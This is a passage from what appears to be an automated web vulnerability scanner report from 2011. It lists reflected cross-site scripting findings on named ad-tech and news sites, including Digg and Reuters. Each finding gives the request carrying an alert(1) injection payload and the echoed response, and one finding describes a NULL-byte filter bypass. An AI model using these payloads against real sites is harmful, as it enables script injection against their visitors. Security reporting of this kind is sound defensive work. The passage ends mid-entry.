User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A11%3A17";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:11:17 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32474

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
s=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775&bd66c<a>6facc3e4125=1]]>
...[SNIP]...

5.43. http://control.adap.tv/control [pageUrl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the pageUrl request parameter is copied into the HTML document as plain text between tags. The payload 8fd77<a>1cad7395e5e was submitted in the pageUrl parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html8fd77<a>1cad7395e5e&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A08";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:08 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32524

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
ories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html8fd77<a>1cad7395e5e&sessionId=25w4w9&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.44. http://control.adap.tv/control [sessionId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the sessionId request parameter is copied into the HTML document as plain text between tags. The payload f2beb<a>113bbd59c6a was submitted in the sessionId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9f2beb<a>113bbd59c6a&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A20";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:20 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33182

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
h=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9f2beb<a>113bbd59c6a&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.45. http://control.adap.tv/control [width parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload d751d<a>d95b0125ac7 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300d751d<a>d95b0125ac7&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A08%3A48";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:08:48 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33240

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300d751d<a>d95b0125ac7&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&html
...[SNIP]...

5.46. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00669e1"><script>alert(1)</script>a84c496149e was submitted in the REST URL parameter 1. This input was echoed as 669e1"><script>alert(1)</script>a84c496149e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00669e1"><script>alert(1)</script>a84c496149e HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=1698788 10.2.128.119
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18218

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00669e1"><script>alert(1)</script>a84c496149e.rss">
...[SNIP]...

5.47. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dab5"-alert(1)-"03e4499d471 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=2dab5"-alert(1)-"03e4499d471 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1314978163_34024:68292:2:0:82_34023:68293:1:713:713; uid=1_1314978163_1314893682667:5756480826433243; kwd=1_1314978163; scg=1_1314978163; ppd=1_1314978163; act=1_1314978163

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:21 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097121_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:45:21 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:45:21 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 320

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=2dab5"-alert(1)-"03e4499d471' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.48. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bc35"-alert(1)-"27e7e245bd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=&2bc35"-alert(1)-"27e7e245bd2=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1314978163_34024:68292:2:0:82_34023:68293:1:713:713; uid=1_1314978163_1314893682667:5756480826433243; kwd=1_1314978163; scg=1_1314978163; ppd=1_1314978163; act=1_1314978163

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:21 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097121_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:45:21 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:45:21 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 323

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=&2bc35"-alert(1)-"27e7e245bd2=1' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.49. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43370"-alert(1)-"7ab0ee228a4 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68283&type=lead43370"-alert(1)-"7ab0ee228a4&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1314978163_34024:68292:2:0:82_34023:68293:1:713:713; uid=1_1314978163_1314893682667:5756480826433243; kwd=1_1314978163; scg=1_1314978163; ppd=1_1314978163; act=1_1314978163

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:21 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097121_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:45:21 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:45:21 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 320

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead43370"-alert(1)-"7ab0ee228a4&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.50. http://jlinks.industrybrains.com/jsct [ct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 659dc<script>alert(1)</script>9947f6192e1 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING659dc<script>alert(1)</script>9947f6192e1&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:44:44 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:44:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 88

// Error: Unknown old section REUTERS_INVESTING659dc<script>alert(1)</script>9947f6192e1

5.51. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3a25e<script>alert(1)</script>42c1db7433c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp&3a25e<script>alert(1)</script>42c1db7433c=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:44:44 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:44:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69

// Error: Unknown parameter 3a25e<script>alert(1)</script>42c1db7433c

5.52. http://jlinks.industrybrains.com/jsct [tr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 27fb8<script>alert(1)</script>88ae6a92ca4 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS27fb8<script>alert(1)</script>88ae6a92ca4&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:44:44 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:44:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 87

// Error: Site 851 has no section NEWS_MARKETS27fb8<script>alert(1)</script>88ae6a92ca4

5.53. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload a66a8<script>alert(1)</script>6d0d8b4836d was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J06575a66a8<script>alert(1)</script>6d0d8b4836d HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="pUMd5U+g/xMULsTCu+k7bfIrtGPDru2phlBoLeuoNfzhcyKV0v4e66ymwRf8sQAvMBtHyphI1d89vppu7+GTtHc81ZviwvzD0+T13dPv5yLdWC026bygOcgoBhWlndX/bqFGkOCQLHNPuGxFg+Rv+WRXlf/Ek1Yq8/wOPJ+T1zi6dv2OfuJEWpRpXdkwStGhjHefgqbGUJOFzgm6lXumZPudI1ur3H6poIG4XN+oq72CN1joRG9rDw4ZCPy3/BgaLnn/4lU70t5qBYPAVhshw8NrWAa2lsyt1g1gM6GKPOCI43TgdZSQilGDhE9IMICiwqhT3mDUXQBudDnXcEYmKXqcwh4KnN8ZpzAOSrJ7WE1pbGslC6X7wFB3pKV9Zsu6NbtMO31FQsuvlRunI5xxPdamEt7kY2EVjzzbmzTVxizSa9b3xlscu70TjKLqDpOaHosGHduftg4Epv+gVSczzkevXFWWxN0u1nnpPNLrbctfQmhfjFwkhwJbWSdFu7ySX1h+93uVK1v9nSO9EF2gdsrOwDU0PNKJ6bdGYIhBHXW2sbJdnlkH/Lfn/PkBEj2Hd9+bo+AJ4s3Oa3OeTgl3fpWZ1OtQVd8AeQsydIoKTtE/3QRuNlF2LV2jsQJHHucIwiETvNABG31SV74cz2jqv5zwiN7yalUwItqZn+d8NZT+50ZO5BxkJPG/UzpQgC3sdoKT8DaY9q4GXrs+cjZSQigz9xi9PGeGDr2RYdV3gmnDLWlv/w=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 04 Sep 2011 00:42:21 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 05 Sep 2011 00:42:21 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:21 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J06575A66A8<SCRIPT>ALERT(1)</SCRIPT>6D0D8B4836D" was not recognized.
*/

5.54. http://js.www.reuters.com/recommend/re/re [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.www.reuters.com
Path:   /recommend/re/re

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7ff1c%3balert(1)//79af3901163 was submitted in the callback parameter. This input was echoed as 7ff1c;alert(1)//79af3901163 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /recommend/re/re?callback=Reuters.tns.updateRecommendations7ff1c%3balert(1)//79af3901163&ed=us&u=9da0587b-a65b-4bca-a7de-c321e48d355a&refreshUrlTimestamp=1315097078225 HTTP/1.1
Host: js.www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:57:56 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:07:56 GMT
max-age: 600000
Content-Type: text/javascript;charset=UTF-8
Content-Length: 157

if (typeof Reuters.tns.updateRecommendations7ff1c;alert(1)//79af3901163 === 'function') {Reuters.tns.updateRecommendations7ff1c;alert(1)//79af3901163([]);}

5.55. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

